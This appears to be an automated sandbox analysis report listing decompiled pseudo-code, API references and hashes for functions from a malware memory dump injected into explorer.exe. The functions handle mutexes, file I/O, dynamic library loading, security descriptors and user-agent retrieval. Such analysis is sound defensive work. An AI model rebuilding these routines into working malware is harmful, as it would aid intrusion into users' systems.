			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x34f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E00088604(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x0008a6ac
0x0008a6ad
0x0008a6ae
0x0008a6b2
0x0008a6b4
0x0008a6b9
0x0008a6c9
0x0008a6cd
0x0008a757
0x0008a757
0x0008a759
0x0008a75b
0x0008a75d
0x0008a75d
0x0008a6d3
0x0008a6e1
0x0008a6e5
0x0008a73d
0x0008a73d
0x0008a743
0x0008a748
0x0008a750
0x0008a756
0x00000000
0x0008a748
0x0008a6e7
0x0008a6f0
0x0008a6f2
0x0008a6f8
0x00000000
0x00000000
0x0008a6fc
0x0008a6ff
0x0008a700
0x0008a706
0x0008a707
0x0008a708
0x0008a72d
0x0008a70f
0x0008a761
0x00000000
0x00000000
0x0008a763
0x0008a766
0x0008a76c
0x0008a76e
0x0008a76e
0x0008a776
0x0008a779
0x00000000
0x0008a779
0x0008a717
0x0008a71a
0x0008a71e
0x0008a720
0x0008a723
0x0008a728
0x0008a72c
0x0008a72c
0x00000000
0x0008a72d
0x0008a6bb
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0034FD30,00000400), ref: 0008A776

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: a34129b748d1e948e0603bfe7886cfa0a731461f5cd668a30662b867c12b276b
Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
Opcode Fuzzy Hash: a34129b748d1e948e0603bfe7886cfa0a731461f5cd668a30662b867c12b276b
Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91

Uniqueness

Uniqueness Score: -1.00%

Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x0008153e
0x00081545
0x0008154b
0x00081552
0x00081607
0x00081607
0x00081607
0x00081558
0x0008155b
0x00081561
0x00081568
0x00000000
0x0008156e
0x00081573
0x00081578
0x0008157d
0x00000000
0x00081583
0x0008158f
0x00081594
0x0008159e
0x000815a3
0x000815ab
0x000815b9
0x000815bf
0x000815c4
0x000815ca
0x000815cc
0x000815d2
0x000815d8
0x000815e4
0x000815ea
0x000815eb
0x000815f2
0x000815f8
0x000815fd
0x00081602
0x000815ce
0x000815ce
0x00000000
0x000815ce
0x000815ad
0x000815ad
0x000815af
0x000815af
0x000815af
0x000815ab
0x0008157d
0x00081568
0x0008160c

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
Opcode Fuzzy Hash: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710

Uniqueness

Uniqueness Score: -1.00%

Function 00085974, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00085974(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E0008A86D( &_v52, __ecx, __eflags);
				_t16 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E00089292("Global");
				_t19 = E0008590C(_t18, _t42,  &_v8); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					CloseHandle(_v8);
					_v8 = 0;
					E0008590C( &_v52, _t42,  &_v8); // executed
				}
				E0008861A( &_v12, 0xffffffff);
				return _v8;
			}

0x0008597c
0x00085982
0x00085988
0x0008598d
0x00085998
0x0008599a
0x0008599a
0x000859a1
0x00000000
0x000859a1
0x000859a9
0x000859ad
0x000859ae
0x000859c0
0x000859c8
0x000859d0
0x000859d3
0x000859dd
0x000859e3
0x000859ec
0x000859f1
0x000859f8
0x00085a05

APIs

CloseHandle.KERNELBASE(00085DD4,?,?,?,?,00000002), ref: 000859DD

Strings

Global, xrefs: 000859B3

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Global
API String ID: 2962429428-4020866741
Opcode ID: aca2857cd06624d21f417f9f9489c735cf79b42b59a9276bf8b949286003dd4b
Instruction ID: ad9e46771b38e1f6345cb022d52bc1c5a3711b7f461b92f87be1531e78fdffdd
Opcode Fuzzy Hash: aca2857cd06624d21f417f9f9489c735cf79b42b59a9276bf8b949286003dd4b
Instruction Fuzzy Hash: 42117C72A04118EBDB00FB98ED45CDDB7F8FB90321F20006AF485E7292EA309E00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}

0x0008e1bf
0x0008e1c2
0x0008e1c8
0x0008e1ca
0x0008e1cf
0x0008e1d1
0x0008e1db
0x0008e1dc
0x0008e1eb
0x0008e1de
0x0008e1de
0x0008e1de
0x0008e1ef
0x0008e1f6
0x0008e1fc
0x0008e1fc
0x0008e201
0x0008e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0x34f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x00082c9e
0x00082ca0
0x00082ca3
0x00082ca9
0x00082cb2
0x00082d36
0x00082d3b
0x00082d3c
0x00082d3e
0x00082d8f
0x00082d40
0x00082d46
0x00082d50
0x00082d55
0x00082d5a
0x00082d5d
0x00082d5e
0x00082d63
0x00082d64
0x00082d65
0x00082d6c
0x00082d6d
0x00082d7a
0x00082d80
0x00082d85
0x00082cb4
0x00082cb9
0x00082cbe
0x00082ccc
0x00082cd0
0x00082cd5
0x00082cdb
0x00082cdd
0x00082ced
0x00082cf2
0x00082cf7
0x00082cfa
0x00082cfb
0x00082d00
0x00082d01
0x00082d02
0x00082d0f
0x00082d15
0x00082cdf
0x00082ce4
0x00082ce4
0x00082d21
0x00082d26
0x00082d93
0x00082d96
0x00082d9d
0x00082da1
0x00082da9
0x00082dbc
0x00082dc1
0x00082dc5
0x00082da9
0x00082dca

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 9f56370e500a6f4cfac612b82a016e3664746281a383755eb8493c24e85cfb68
Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
Opcode Fuzzy Hash: 9f56370e500a6f4cfac612b82a016e3664746281a383755eb8493c24e85cfb68
Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xb0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

0x00085aff
0x00085aff
0x00085b0a
0x00085b0c
0x00085b12
0x00085b18
0x00085b22
0x00085b2b
0x00085b36
0x00085b41
0x00085b47
0x00085b4f
0x00085b4f
0x00085b55
0x00085b5b
0x00085b5e
0x00085b69
0x00085b71
0x00085b73
0x00085b78
0x00085b98
0x00085b9f
0x00000000
0x00085ba1
0x00085ba1
0x00085ba1
0x00085b7a
0x00085b7a
0x00085b7c
0x00085b80
0x00000000
0x00085b82
0x00085b82
0x00085b85
0x00085b8b
0x00085b8e
0x00000000
0x00085b90
0x00000000
0x00085b90
0x00000000
0x00085b8e
0x00085b96
0x00085ba6
0x00085ba8
0x00000000
0x00000000
0x00000000
0x00085b96
0x00085b80
0x00085bad
0x00085bb0
0x00085bb8
0x00085bc3

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetDriveTypeW.KERNELBASE(?), ref: 00085B4F

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateDriveHeapType
String ID:
API String ID: 414167704-0
Opcode ID: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
Opcode Fuzzy Hash: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0008BC7A, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x1e4
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0x34fab8
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0x34fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0x34fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0x34fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}

0x0008bc81
0x0008bc84
0x0008bc8f
0x0008bc92
0x0008bc95
0x0008bc98
0x0008bc9b
0x0008bca1
0x0008bca5
0x0008bca8
0x0008bca9
0x0008bcab
0x0008bcac
0x0008bcb9
0x0008bcbe
0x0008bcc2
0x0008bcc6
0x0008bcc7
0x0008bccc
0x0008bcd7
0x0008bcd9
0x0008bcdc
0x0008bce1
0x0008bce2
0x0008bce3
0x0008bce4
0x0008bce6
0x0008bce8
0x0008bcf1
0x0008bcf3
0x0008bcf3
0x0008bcf1
0x0008bcf4
0x0008bcfd
0x0008bcfd
0x0008bd04
0x0008bd0f

APIs

SetSecurityInfo.ADVAPI32(000001E4,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: InfoSecurity
String ID:
API String ID: 3528565900-0
Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0x32f530
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0x32f530
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x0008e453
0x0008e454
0x0008e45c
0x0008e4a6
0x0008e4b3
0x0008e4b8
0x00000000
0x0008e45e
0x0008e463
0x0008e46a
0x0008e473
0x0008e47a
0x0008e481
0x0008e485
0x0008e4bd
0x0008e4c0
0x0008e487
0x0008e499
0x0008e499
0x0008e485

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: b424cfbd32e5a4a4fc9b59087bcc82cf40a6a26874494f9add4b8dc47a0913b5
Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
Opcode Fuzzy Hash: b424cfbd32e5a4a4fc9b59087bcc82cf40a6a26874494f9add4b8dc47a0913b5
Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715

Uniqueness

Uniqueness Score: -1.00%

Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x0008a65c
0x0008a65f
0x0008a660
0x0008a663
0x0008a665
0x0008a668
0x0008a66d
0x0008a69e
0x0008a6a0
0x0008a66f
0x0008a66f
0x0008a66f
0x0008a691
0x00000000
0x00000000
0x0008a693
0x0008a696
0x0008a69c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0008a69c
0x0008a6a5
0x0008a6a5
0x0008a6a1
0x0008a6a4

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x0008a601
0x0008a615
0x0008a61a
0x0008a623
0x0008a625
0x0008a62f
0x0008a62f
0x00000000
0x0008a635
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371

Uniqueness

Uniqueness Score: -1.00%

Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x0008a64f
0x0008a652
0x0008a657
0x0008a65b

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720

Uniqueness

Uniqueness Score: -1.00%

Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}

0x00088612
0x00088619

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

